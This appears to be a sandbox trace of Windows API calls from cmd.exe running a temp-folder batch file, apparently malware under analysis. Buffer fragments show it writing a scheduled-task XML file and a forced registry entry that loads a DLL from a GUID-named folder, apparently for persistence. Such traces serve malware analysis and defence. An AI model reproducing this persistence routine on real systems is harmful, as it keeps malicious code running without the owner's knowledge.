[0378.075] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.075] GetProcessHeap () returned 0x200000
[0378.076] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.076] GetProcessHeap () returned 0x200000
[0378.077] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.077] _tell (_FileHandle=3) returned 1316
[0378.077] _close (_FileHandle=3) returned 0
[0378.077] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.077] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.077] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.077] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.077] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.077] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.077] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.077] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.078] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.078] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.078] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.078] GetFileType (hFile=0x7) returned 0x2
[0378.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.079] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.079] _dup (_FileHandle=1) returned 3
[0378.080] _close (_FileHandle=1) returned 0
[0378.081] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.081] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.081] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.081] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.081] GetFileType (hFile=0x64) returned 0x1
[0378.081] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1f4
[0378.082] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x1f3
[0378.082] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.082] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.082] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x231400, Size=0x4c) returned 0x21f500
[0378.082] GetProcessHeap () returned 0x200000
[0378.082] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21f500) returned 0x4c
[0378.083] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="kEecfMwgj \r\n") returned 29
[0378.083] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.083] GetFileType (hFile=0x64) returned 0x1
[0378.083] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.083] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="kEecfMwgj \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj \r\n", lpUsedDefaultChar=0x0) returned 30
[0378.083] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1d, lpOverlapped=0x0) returned 1
[0378.083] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.085] _close (_FileHandle=3) returned 0
[0378.086] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.086] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.086] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.087] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.088] SetConsoleInputExeNameW () returned 0x1
[0378.088] GetConsoleOutputCP () returned 0x1b5
[0378.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.088] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.089] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.089] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.089] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.089] SetFilePointer (in: hFile=0x64, lDistanceToMove=1316, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0378.089] GetProcessHeap () returned 0x200000
[0378.089] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f560 | out: hHeap=0x200000) returned 1
[0378.089] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.090] GetProcessHeap () returned 0x200000
[0378.090] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.091] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.091] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x524
[0378.091] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0xa0e, lpOverlapped=0x0) returned 1
[0378.091] SetFilePointer (in: hFile=0x64, lDistanceToMove=1369, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0378.091] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=53, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n\ntemp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 53
[0378.091] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.091] GetFileType (hFile=0x64) returned 0x1
[0378.092] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.092] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0378.092] GetProcessHeap () returned 0x200000
[0378.092] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.092] GetProcessHeap () returned 0x200000
[0378.092] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.092] GetProcessHeap () returned 0x200000
[0378.092] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.092] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.092] GetProcessHeap () returned 0x200000
[0378.092] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.093] GetProcessHeap () returned 0x200000
[0378.093] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.093] GetProcessHeap () returned 0x200000
[0378.093] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.094] _tell (_FileHandle=3) returned 1369
[0378.094] _close (_FileHandle=3) returned 0
[0378.094] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.094] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.094] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.094] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.094] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.095] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.095] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.095] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.095] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.095] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.095] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.095] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.095] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.095] GetFileType (hFile=0x7) returned 0x2
[0378.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.096] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.096] _dup (_FileHandle=1) returned 3
[0378.097] _close (_FileHandle=1) returned 0
[0378.098] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.098] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.098] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.098] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.098] GetFileType (hFile=0x64) returned 0x1
[0378.098] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x211
[0378.098] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x210
[0378.099] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.099] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.099] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21cc60, Size=0x50) returned 0x21cc60
[0378.099] GetProcessHeap () returned 0x200000
[0378.099] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21cc60) returned 0x50
[0378.099] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 31
[0378.099] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.099] GetFileType (hFile=0x64) returned 0x1
[0378.099] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.100] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 32
[0378.100] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x1f, lpOverlapped=0x0) returned 1
[0378.100] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.101] _close (_FileHandle=3) returned 0
[0378.102] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.103] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.103] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.104] SetConsoleInputExeNameW () returned 0x1
[0378.104] GetConsoleOutputCP () returned 0x1b5
[0378.104] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.104] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.105] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.105] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.105] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.105] SetFilePointer (in: hFile=0x64, lDistanceToMove=1369, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0378.105] GetProcessHeap () returned 0x200000
[0378.105] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0378.105] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.106] GetProcessHeap () returned 0x200000
[0378.106] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.107] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.107] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x559
[0378.107] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x9d9, lpOverlapped=0x0) returned 1
[0378.107] SetFilePointer (in: hFile=0x64, lDistanceToMove=1405, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0378.107] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=36, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n>> %temp%\\a.xml\r\n\ntemp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 36
[0378.107] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.107] GetFileType (hFile=0x64) returned 0x1
[0378.107] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.107] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0378.108] GetProcessHeap () returned 0x200000
[0378.108] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.108] GetProcessHeap () returned 0x200000
[0378.108] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.108] GetProcessHeap () returned 0x200000
[0378.108] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.108] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.108] GetProcessHeap () returned 0x200000
[0378.108] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.108] GetProcessHeap () returned 0x200000
[0378.109] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.109] GetProcessHeap () returned 0x200000
[0378.110] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.110] _tell (_FileHandle=3) returned 1405
[0378.110] _close (_FileHandle=3) returned 0
[0378.110] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.110] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.110] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.110] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.110] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.110] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.111] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.111] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.111] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.111] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.111] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.111] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.111] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.111] GetFileType (hFile=0x7) returned 0x2
[0378.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.112] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.112] _dup (_FileHandle=1) returned 3
[0378.113] _close (_FileHandle=1) returned 0
[0378.114] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.114] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.114] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.114] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.114] GetFileType (hFile=0x64) returned 0x1
[0378.114] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x230
[0378.114] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x22f
[0378.115] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.115] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.116] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x228690, Size=0x2e) returned 0x216db0
[0378.116] GetProcessHeap () returned 0x200000
[0378.116] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x2e
[0378.116] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 14
[0378.116] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.116] GetFileType (hFile=0x64) returned 0x1
[0378.116] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.116] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 15
[0378.117] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xe, lpOverlapped=0x0) returned 1
[0378.117] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.118] _close (_FileHandle=3) returned 0
[0378.119] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.119] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.120] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.120] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.121] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.121] SetConsoleInputExeNameW () returned 0x1
[0378.121] GetConsoleOutputCP () returned 0x1b5
[0378.122] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.122] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.122] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.122] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.123] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.123] SetFilePointer (in: hFile=0x64, lDistanceToMove=1405, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0378.123] GetProcessHeap () returned 0x200000
[0378.123] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216df0 | out: hHeap=0x200000) returned 1
[0378.123] GetProcessHeap () returned 0x200000
[0378.123] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.123] GetProcessHeap () returned 0x200000
[0378.123] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.123] GetProcessHeap () returned 0x200000
[0378.123] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.123] GetProcessHeap () returned 0x200000
[0378.124] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.124] GetProcessHeap () returned 0x200000
[0378.124] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.124] GetProcessHeap () returned 0x200000
[0378.124] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.124] GetProcessHeap () returned 0x200000
[0378.124] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.124] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.124] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57d
[0378.136] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x9b5, lpOverlapped=0x0) returned 1
[0378.136] SetFilePointer (in: hFile=0x64, lDistanceToMove=1442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0378.137] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=37, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n> %temp%\\a.xml\r\n\ntemp%\\a.xml \r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 37
[0378.137] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.137] GetFileType (hFile=0x64) returned 0x1
[0378.137] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.137] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2
[0378.137] GetProcessHeap () returned 0x200000
[0378.137] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.137] GetProcessHeap () returned 0x200000
[0378.138] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.138] GetProcessHeap () returned 0x200000
[0378.138] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
